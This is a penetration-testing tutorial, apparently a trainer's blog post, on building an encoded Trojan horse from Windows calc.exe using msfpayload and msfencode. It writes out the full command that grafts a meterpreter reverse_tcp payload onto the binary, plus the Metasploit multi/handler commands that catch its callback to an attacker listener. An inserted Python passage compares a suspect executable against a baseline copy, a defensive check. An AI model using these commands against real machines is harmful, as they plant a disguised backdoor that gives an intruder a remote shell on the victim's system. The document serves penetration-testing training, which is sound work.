
Creating Trojan Horse (Encoded) By Using Msfpayload

Creating Trojan horse

The backdoors in the previous sections run entirely out of sight and do not interact with the user logged into the system at the time. A Trojan horse gives the appearance of a functional program that the user may use. This guide was created from the calc.exe application from a Microsoft Windows XP, Service Pack 3 platform. For this exercise to work correctly, the calc.exe application must be copied to an external thumb drive.

Not all binaries on the Windows platform are susceptible to Trojanization. For example, if the calc.exe application from a Windows 7 Ultimate platform was used, this attack would not execute at all. Other considerations are the amount of encoding used, active firewalls, IDS (Intrusion Detection System), and cryptosystems. Not all executables will work; Trojanization of an executable is a trial-and-error process, best suited for a lab.

#msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe -x /root/Desktop/calc.exe -o /root/Desktop/encodeTrojancalc.exe


The figure shows the output from creating the trojan-cmd-payload.exe Trojan horse from a Windows calc.exe binary. The Trojan horse made from the Windows binary calc.exe can be transferred to an exploited machine by various methods.
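From the defender's side, a binary that has had code grafted into it no longer matches the original. The following added example (not part of the original guide) compares a suspect executable with a known-good copy by SHA-256, entry point and section flags. The sample images, their values and the function names are constructed for illustration, and the checks are generic integrity heuristics rather than signatures for any tool.

```python
import hashlib
import struct

EXEC, WRITE = 0x20000000, 0x80000000  # IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE

def pe_summary(data):
    """Return (sha256, entry point RVA, {section name: characteristics})."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe = struct.unpack_from("<I", data, 0x3C)[0]              # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsect = struct.unpack_from("<H", data, pe + 6)[0]         # NumberOfSections
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]     # SizeOfOptionalHeader
    entry = struct.unpack_from("<I", data, pe + 24 + 16)[0]   # AddressOfEntryPoint
    sections = {}
    for i in range(nsect):
        off = pe + 24 + opt_size + 40 * i                     # 40-byte section headers
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        sections[name] = struct.unpack_from("<I", data, off + 36)[0]
    return hashlib.sha256(data).hexdigest(), entry, sections

def compare(baseline, suspect):
    """List differences between a known-good binary and a suspect copy."""
    good_hash, good_entry, good_sect = pe_summary(baseline)
    bad_hash, bad_entry, bad_sect = pe_summary(suspect)
    findings = []
    if good_hash != bad_hash:
        findings.append("sha256 differs from baseline")
    if good_entry != bad_entry:
        findings.append(f"entry point moved: {good_entry:#x} -> {bad_entry:#x}")
    for name, flags in bad_sect.items():
        if (flags & EXEC) and (flags & WRITE) and not (good_sect.get(name, 0) & WRITE):
            findings.append(f"section {name} is now writable and executable")
    return findings

def make_pe(entry, text_flags):
    """Constructed header-only PE image (no code) used as sample input."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x102)
    opt = struct.pack("<HBBIIII", 0x10B, 0, 0, 0, 0, 0, entry).ljust(224, b"\0")
    sect = b".text".ljust(8, b"\0") + struct.pack(
        "<IIIIIIHHI", 0x1000, 0x1000, 0x200, 0x200, 0, 0, 0, 0, text_flags)
    return dos + b"PE\0\0" + coff + opt + sect

BASELINE = make_pe(0x1000, 0x60000020)  # constructed: code, execute, read
SUSPECT = make_pe(0x1800, 0xE0000020)   # constructed: same section, also writable
```

On real files, read both copies with `open(path, "rb").read()` and take the baseline from trusted installation media rather than from the host under investigation.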

 

Set Up a Metasploit Listener:

The backdoor and Trojan horse that were made are client-side attacks and call home for further instructions. The security tester will need to set up a listener in Metasploit to answer the call. The multi-handler inside Metasploit is a glorified answering service for a Trojan or backdoor to call home and get further instructions.

#msfconsole

>use exploit/multi/handler

>set PAYLOAD windows/meterpreter/reverse_tcp

>set LHOST {Attacker_IP}

>set LPORT 4444

>run


The figure shows the setup of a listener in Metasploit and a call back from a backdoor. The connection was established when the unencoded-payload.exe application was executed on the exploited victim's operating system.

About Vijay Kumar

Ethical Hacking & Penetration Testing Trainer

2 comments

  1. danishsherzad@gmail.com'

    Hello sir, how are you? Hoping you are doing well there at Hi-Tech. Missing you all. Who all is coming these days?
    Have any new students come there? And I keep watching your videos. Tell me what else is new. Waiting for your reply.
